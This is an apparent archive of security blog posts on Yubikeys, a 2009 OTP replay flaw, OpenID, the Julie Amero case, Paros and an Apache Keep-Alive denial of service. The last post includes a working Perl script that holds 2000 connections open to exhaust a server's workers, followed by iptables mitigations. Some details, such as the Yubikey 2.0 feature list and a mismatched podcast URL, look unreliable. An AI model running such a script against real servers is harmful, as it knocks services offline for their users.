Simple Disaster Recovery Backup for VMware

Sometimes the simplest scripts are the best. Disaster Recovery (DR) backups do not have to be made every day. At some places I've worked we made DR backups as little as once a year.

DR backups contain everything. You copy the entire environment so you can buy new hardware and restore the operation of the needed services as quickly as possible without installing from scratch. Backups on tape are great, but how can you restore the data if you don't have a tape server with the right OS and software in place, ready to do the restore? VMware makes this easy because it uses files as disks and you can make point-in-time snapshots.

Yubikey 2.0

I have received my Yubikey 2.0 from Yubico and it is nice.

The biggest new feature is that it has two internal configurations. Each can be programmed with different functions. With version 1 of the Yubikey you could program it to be a static password or reprogram it with your own AES-128 key. The static password is nice but much less secure, and if you update the AES key you can't use it with Yubico's authentication server any longer. (This has changed.) I wanted to use my Yubikey as a one time password (OTP), not a static password, so I never reprogrammed it.

With the new Yubikey 2.0 you can have the best of both worlds. I can now tap my Yubikey and it will give me an OTP, or I can hold the button for 2.5 seconds and it will spit out a 64 character password. The password is good for things like TrueCrypt passwords and encrypted hard disk passwords.

– functions like CapsLock double-clicking and auto-URL navigation are gone.
– It cannot be programmed unless you have obtained its AES key – but Yubico shipped all "developer's keys" without the protection set.
– It deactivates itself for some time if a failed programming attempt is detected.
– It can be ordered in various colours (black and white for now).
– It supports a PIN: after inserting the key, you need to type a 6 digit [0-9] PIN on your keyboard to activate it (it will blink to indicate success).

You can get your own Yubikey here.

Yubikey Replay Attack

On January 29th (2009) I found a flaw in the Yubico authentication server used by owners of the Yubikey. It allowed reuse of one time passwords (OTP) generated by a Yubikey during the same insertion.

Yubico responded quickly, fixed the bug and released this statement: "The previous version (of the authentication server code) did not properly detect OTPs generated within that same session where the Yubikey remains inserted in the USB slot. If the Yubikey was removed and then reinserted again and a new OTP is generated (most common use case) then OTPs from previous session were invalidated correctly and detected as replay attacks. However, for OTPs that were generated while the key remained inserted then OTPs within that session could be replayed without detection until next removal and insertion of the Yubikey. The reason was that the Yubikey counter for “session use” was not checked by the server."

The bug was caused by the “session use” counter not being checked by the server. For firmware versions before 1.3.3, the validation server checked the timestamp instead of the session counter, but this check was dropped due to incompatibility with firmware 1.3.3. The bug is now fixed in the Yubico validation server source code as of 2009-02-07.

This flaw would have allowed a man in the middle (MITM) attacker to reuse an OTP after more than one was generated, if the key was not reinserted. For example, if the user were to plug in the Yubikey and begin to log on to a group of SSH sessions without removing the key, the attacker could reuse the OTPs to log in to the servers, or to others the Yubikey was valid on, until the Yubikey was removed, reinserted and used again.

The only recommendation I have now that the bug has been fixed applies even if the bug had not been found. If you have any suspicion your Yubikey has been "borrowed" and you are using it in OTP mode (not static password mode), use it immediately to invalidate previously generated OTPs.
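To make the counter check concrete, here is an added example (my own simulation, not Yubico's validation server code) that models the two counters carried inside every OTP: one that increments on each insertion and a "session use" counter that increments for every button press while the key stays inserted. The key model, field names and function names are constructed for the example.

```python
# Added example (not Yubico's code): simulate the counter check behind the
# 2009 replay bug.  Each OTP carries a "session" counter (bumped once per
# insertion) and a "session use" counter (bumped per OTP while inserted).
# The validator keeps the last accepted pair per key; names are constructed.

class SimulatedYubikey:
    """Constructed stand-in for a key: emits (session, session_use) pairs."""

    def __init__(self):
        self.session = 0
        self.session_use = 0

    def insert(self):                 # removing and reinserting the key
        self.session += 1
        self.session_use = 0

    def press_button(self):           # generate one OTP
        otp = {"session": self.session, "session_use": self.session_use}
        self.session_use += 1
        return otp


def validate_buggy(state, otp):
    """Pre-fix behaviour: only the per-insertion counter is compared, so a
    second OTP from the same insertion looks identical to the first."""
    if otp["session"] < state.get("session", -1):
        return False                  # OTP from an older insertion: replay
    state["session"] = otp["session"]
    return True


def validate_fixed(state, otp):
    """Fixed behaviour: the (session, session_use) pair must be strictly
    greater than the last accepted pair, so an OTP replayed within the
    same insertion is rejected as well."""
    seen = (state.get("session", -1), state.get("session_use", -1))
    now = (otp["session"], otp["session_use"])
    if now <= seen:
        return False                  # equal or older pair: replay
    state["session"], state["session_use"] = now
    return True


def replay_scenario(validate):
    """Insert once, log in to three servers without removing the key, then
    replay the second OTP.  Returns the validator's verdict on the replay."""
    key, server_state = SimulatedYubikey(), {}
    key.insert()
    otps = [key.press_button() for _ in range(3)]
    if not all(validate(server_state, o) for o in otps):
        raise RuntimeError("genuine OTPs must be accepted")
    return validate(server_state, otps[1])
```

With the buggy check the replayed OTP is accepted; with the fixed check it is rejected, and both checks still reject an OTP from an earlier insertion.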

Totally Secure – Update

I received my PayPal Security Key in the mail today. I have been waiting for three weeks for it to arrive. Activation was easy. Thank you PayPal. I hope more companies follow your lead.

I tried my PayPal Security Key on the MyPW website. The hope was I could activate it there as well.  It didn't work.  I was not expecting it to.

I'm still seeking the perfect login process. I'm excited because I see hope. I think MyPW has it right. For a very small fee they provide an authentication service that can be used by any Internet-connected program. It would be possible for you to log in to your desktop at home, your MySpace account, your email at Google, your PayPal account and even your bank by logging into any one of them once, if they all used OpenID. You could then choose an OpenID provider like myOpenID.com, claimID.com, or MyPW.

The last big issue is PASSWORDS SUCK! There are simply too many ways to get someone's password, from keystroke loggers to just looking over someone's shoulder. I feel this destroys the value of a single sign-on service like Passport. (Now called Windows Live ID.)

The key-bob provided by MyPW fixes the password problem. The key-bob contains a one time pad (OTP) known only by the key-bob and the provider (MyPW). It cannot be guessed. Each login attempt has a one in a million chance of getting it right. Add a password to this, and even if the key-bob gets lost, the person who finds it cannot access your account because they don't know your password. If someone only records your password with a keystroke logger it will not work, because they don't know the next complete password containing the next random number.

The key-bob used by PayPal and MyPW is the DigiPass G-3 from Vasco. It is likely PayPal and MyPW purchased the system from Vasco. Vasco has other models.

Totally Secure

I have been waiting for years for a computer security company to pull their head out of their ass and make a security device that's easy to use and cheap. It has happened.

MyPW is making a one time password token available to anyone at an affordable price.

Most people use the same or similar passwords for all their online accounts. With this token there is almost no way anyone can guess your password, because it changes every time you use it. Every time you push the button on the key-bob it displays a new random number. You use this random number as your password. Anyone trying to guess your password has exactly a 1 in 1,000,000 chance of getting it right. Add a password to this and the odds become fantastically high.

With a MyPW token you can access any MyPW enabled service and thousands of OpenID enabled web sites. Here is how it works.

When you log in to a MyPW enabled website or one using OpenID, your password authentication request is redirected to a MyPW server. MyPW.com verifies your random number and returns a good or bad signal back to the requesting process.

Let us say you have a Linux system at home and you'd like to access it from work.  You know they monitor the office network. They could capture your network traffic and capture your password. You might even be using SSL to encrypt your data but if you don't check the ID of the certificate you get back you may be going through a company proxy and they are decrypting your traffic.  This is legal because you are using their network.

Order your token. You install the MyPW PAM module. (I've had a little trouble getting this part done.  You have to compile the code.) You then edit the file /etc/pam.d/xmlrpc.conf and add your ID and token info to the file.  It will look like this.

mark mysite aslk1u401da2901 5999999 https://services.mypw.com/RPC2

After you compile and install the PAM module you'll need to sign up for their free API access account and a token, or MyPW for your mobile phone. Now when you log in using this account, your server will use MyPW to verify your password (the random number). If anyone from your office tries to reuse the password it will not work a second time.

I haven't ordered a token from MyPW yet. I will.  I have ordered a PayPal token for $5 and I'm guessing they are the same. I'm hoping PayPal and services like them wouldn't require you to carry around a token for each web service you use.  This is what OpenID is all about. In a perfect world, I should be able to use one token to access all my accounts. This can be done today if everyone used OpenID as their login.

Who Am I

Who am I?

I google, therefore I am. But who am I?

On the Internet nobody knows you're a dog. That's great. Anonymity is a wonderful thing that lets the truth be told without people being killed. It also allows for identity theft. Employers Google prospective employees to look into their past. What if someone with your name was arrested for drunk driving? How can you disclaim stories using your name?

I've found ClaimID.com helps people simply and easily manage their online identity. You can claim things that are about or by yourself and deny things that have nothing to do with you or are false. Here is who I am.

How many Internet logon IDs do you have? Do you have more than one for some sites? I do too. Do you use the same password for each? If you do, your protection is only as good as the weakest of them. Do you use the same password for your bank as you do for your favorite blog?

If every website would use it, OpenID could end our password problems. OpenID is a free / Open protocol designed to manage authentication.  Here is how it works.

When you log in to a site that uses OpenID it takes you to your choice of websites to log in. For example, if I log in to the OpenID Directory, after clicking on login I type in mark.grennan.com. What's on this page doesn't matter. What matters is in the header (not seen in your browser): there is this string: <link rel="openid.server" href="http://openid.claimid.com/server" />. This sends me to ClaimID's OpenID server, which asks me for my password. It then sends me back to the OpenID Directory.

There is a great Video about OpenID on Google Video.

What makes OpenID good is its simplicity. You control where your authentication is done and how. You can use a service like OpenID, ClaimID or Verisign's Personal Identity Provider, or you could create your own system that requires all kinds of information to authenticate you. If you're logging into your bank, type in the ID that redirects you to a high-security service.
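The discovery step described above, as an added example (my own code, not ClaimID's or any OpenID library's): the relying party fetches the page named by the user, reads the openid.server link from its head and redirects the browser there. The HTML is constructed; the server href is the one quoted above, the delegate URL and the other.example host are made up.

```python
# Added example (not part of the original post): OpenID 1.x discovery.
# Only <link> tags inside <head> count, so a tag injected into the body
# (a comment, a profile field) cannot redirect the login elsewhere.
from html.parser import HTMLParser

CONSTRUCTED_PAGE = """<html><head>
<title>Mark Grennan</title>
<link rel="openid.server" href="http://openid.claimid.com/server" />
<link rel="openid.delegate" href="http://claimid.com/example-user" />
</head><body>
<p>What's on this page doesn't matter.</p>
<link rel="openid.server" href="http://other.example/server" />
</body></html>"""


class OpenIDLinkParser(HTMLParser):
    """Collect openid.server / openid.delegate links found inside <head>."""

    def __init__(self):
        super().__init__()
        self.in_head = False
        self.found = {}

    def handle_starttag(self, tag, attrs):
        if tag == "head":
            self.in_head = True
        elif tag == "link" and self.in_head:
            a = dict(attrs)
            rel = (a.get("rel") or "").lower()
            if rel in ("openid.server", "openid.delegate") and a.get("href"):
                self.found.setdefault(rel, a["href"])   # first tag wins

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False


def discover(html):
    """Return {'server': url, 'delegate': url_or_None}, or None when the
    page carries no openid.server link in its head and so cannot be used
    as an OpenID identity page."""
    parser = OpenIDLinkParser()
    parser.feed(html)
    server = parser.found.get("openid.server")
    if server is None:
        return None
    return {"server": server, "delegate": parser.found.get("openid.delegate")}
```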

Take control of your identity.

Computer Illiterate Teacher Goes to Jail

Julie Amero, a substitute teacher, was convicted of exposing children in her classroom to Internet porn. I believe this is a great injustice. I've read she was told to let the kids use the computer and not to turn it off. I've also read the computer was an old Windows 95 system. My experience tells me this computer was not well maintained. I'd place a bet that it had never been updated. Evidence of this is the fact that the computer was running Internet Explorer 5. IE5 is very old.

The computer forensics examiner W. Herbert Horner confirmed everything she said: the computer was infected before she got there, a site visited that morning caused the pop-ups to start, and the porn was the result of pop-ups, not deliberate action. The judge didn't let Horner give his full testimony. Horner later said, "This was one of the most frustrating experiences of my career, knowing full well that the person is innocent and not being allowed to provide logical proof."

Some have said she should have just turned off the computer. But the harm was already done. Turning off the computer wouldn't have helped.

I believe the people responsible are the administrators of the school system of Norwich. It took a lot of neglect of what the Internet is like, and of how computer vulnerabilities are found every day, to put such a system in a classroom.

Now Julie Amero may get some help. Connecticut criminal defense lawyer William Dow has stepped in and offered help to Julie Amero.

I'm wondering if other children in the Norwich school district are at risk?

McAfee Calls for the “Digital Dark Ages”

This month (July 2006) McAfee Avert Labs published the first issue of Sage. Sage is a semiannual newsletter with the goal of publishing predictive and incisive security research that helps you understand the current and evolving threat environment.

Over the years I have been happy with McAfee and their products. Recently, I have become very pleased with McAfee because of the Sabag Security podcast produced by two of their employees (http://www.saeagsecurity.com/). Sabag Security is a wonderful weekly coverage of what's happening in security. When I downloaded and read the first issue of Sage, I expected something like the podcast with more details.

To my surprise, McAfee's Sage newsletter is a blast at Open Source and intellectual freedom and a call to keep us all secure by making all intellectual property (IP) secret.

Sage opens with the Editor's notes by Kevin J. Soo Hoo.  Mr. Hoo describes Open Source by saying "By open source, we refer to the free and unconditional sharing of source code and ideas."  Mr. Hoo also says "Whether posting a terrorist training manual or a how-to guide for attacking infrastructure, there are consequences to the free and open share of information –".


Where are you really going today?

I found this great webpage testing tool called Paros. You configure it as a proxy server and it records every connection your browser makes. It is used to debug websites. I used it to monitor what my browser was doing and I was quite surprised.

As an experiment I went to five websites I visit regularly.

    www.google.com        – Search
    www.yahoo.com         – Search
    www.kfor.com          – Local news
    www.myspace.com       – Watching my child
    www.classmates.com    – My wife's 30th reunion

I was expecting two or three hits per URL. It is common for companies to have more than one web server for their site. Some systems hold graphics while others monitor your access. I was surprised to see my clicks are ten to one. I accessed ten sites for every URL I went to.


The Apache Keep-Alive Tarpit Exploit

I have found a denial of service (DoS) problem with the Keep-Alive setting in Apache version two. This may exist in other versions as well.

What I’ve found is that with Keep-Alive off, Apache will continue to serve content, while with Keep-Alive on a simple script can use up every connection on a server and block other users.

Here is the test I used.

1) turn on server-status
2) check the setting – KeepAlive On
3) set KeepAliveTimeout to 45
4) restart Apache
5) run the script below and watch the connections
6) browse the server under attack. It should continue to work
7) un-comment the Keep-Alive line in the script and perform the test again.

The server-status module has a scoreboard block that shows the current connection states for each possible connection.

____K__._.__K___K__K_K___CK_WK__K_K_.C__K___K__KK__K__K_K__K_K__
_______KK__K___K_K_K__KK___KK___K____K______K_____K_______K__K_K
_KKKK__...______C_K____.__.._KK__K_K_K______K__K_K_________K_K_
__K____.KKK_KKK__K__K_K____C_____.___KK___K_W____K__KKK___K_K___
_KK________K____K__K_____.___K___._KK___K___KK__K________K_K_KK_

Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process

I found that with Keep-Alive off, this connection block shows all ‘W’s and the server continues to serve content. I think Apache closes the oldest connection for the new requests. With Keep-Alive on, each connection opened is dedicated to the user that opened it.

So Keep-Alive can be used as a very effective denial of service attack, especially if the Apache KeepAliveTimeout setting is high. The default KeepAliveTimeout is five (5) seconds. I have worked on systems where this number is set as high as 45 seconds.
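Detection logic for the scoreboard above, as an added example that is not part of the original post: it counts each worker state in the server-status scoreboard using the key printed by server-status, and raises an alarm when keep-alive workers hold more than a chosen share of all slots. The scoreboard text is the one shown above; the threshold and function names are this example's own choices.

```python
# Added example (not from the original post): parse the server-status
# scoreboard and flag keep-alive exhaustion.  SCOREBOARD_KEY follows the
# key printed by Apache's server-status page; the sample is copied from
# the scoreboard shown in the post.

SCOREBOARD_KEY = {
    "_": "waiting", "S": "starting", "R": "reading", "W": "sending",
    "K": "keepalive", "D": "dns", "C": "closing", "L": "logging",
    "G": "graceful", "I": "idle_cleanup", ".": "open_slot",
}

SAMPLE_SCOREBOARD = """
____K__._.__K___K__K_K___CK_WK__K_K_.C__K___K__KK__K__K_K__K_K__
_______KK__K___K_K_K__KK___KK___K____K______K_____K_______K__K_K
_KKKK__...______C_K____.__.._KK__K_K_K______K__K_K_________K_K_
__K____.KKK_KKK__K__K_K____C_____.___KK___K_W____K__KKK___K_K___
_KK________K____K__K_____.___K___._KK___K___KK__K________K_K_KK_
"""


def count_states(scoreboard):
    """Return {state_name: count} for the scoreboard, ignoring whitespace.
    Unknown characters land under 'unknown' so a changed server-status
    format is noticed instead of being silently miscounted."""
    counts = {name: 0 for name in SCOREBOARD_KEY.values()}
    counts["unknown"] = 0
    for ch in scoreboard:
        if ch.isspace():
            continue
        counts[SCOREBOARD_KEY.get(ch, "unknown")] += 1
    return counts


def keepalive_ratio(scoreboard):
    """Share of all slots (busy, waiting and open) parked in keep-alive."""
    counts = count_states(scoreboard)
    total = sum(counts.values())
    return counts["keepalive"] / total if total else 0.0


def keepalive_alarm(scoreboard, max_ratio=0.25):
    """True when keep-alive workers exceed max_ratio of all slots.  A
    tarpit run fills slots with 'K' while 'W' stays low; a busy but
    healthy server shows mostly 'W'.  Tune max_ratio to your MaxClients."""
    return keepalive_ratio(scoreboard) > max_ratio
```

On the sample, 85 of 319 slots are in keep-alive against only 2 sending a reply, which is the pattern the check looks for.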

My proof of concept script tries to open 2000 tcp connections to YOUR.IP.GOES.HERE and then sleeps for sixty seconds.

Here is the script I used.

#!/usr/bin/perl
# Opens up to 2000 TCP connections to the target and holds them for 60 seconds.
use IO::Socket;

$a = 2000;
$sock[$a] = 0;
while ($a > 0) {
    $sock[$a] = new IO::Socket::INET (
        PeerAddr => 'YOUR.IP.GOES.HERE',
        PeerPort => '80',
        Proto    => 'tcp',
    );
    die "Could not create socket: $!\n" unless $sock[$a];
    my $sck = $sock[$a];
    print $sck "GET / HTTP/1.0\n";
    # un-comment the next line for the Keep-Alive test (step 7 above)
#    print $sck "Connection: Keep-Alive\n";
    print $sck "\n";
    $a--;
}
sleep 60;

If you are using SSL, turning off Keep-Alive may be very painful. Without Keep-Alive, SSL sessions get negotiated much more often.

One way to limit this attack is to use a firewall and limit the number of new TCP sessions that can be opened from a single IP.

With Linux iptables the rules look like this:

iptables -A INPUT -i eth0 -p tcp --dport 80 -m state --state NEW -m recent --set
iptables -A INPUT -i eth0 -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 4 --hitcount 8 -j DROP

I hope someone can show where I've gone wrong here.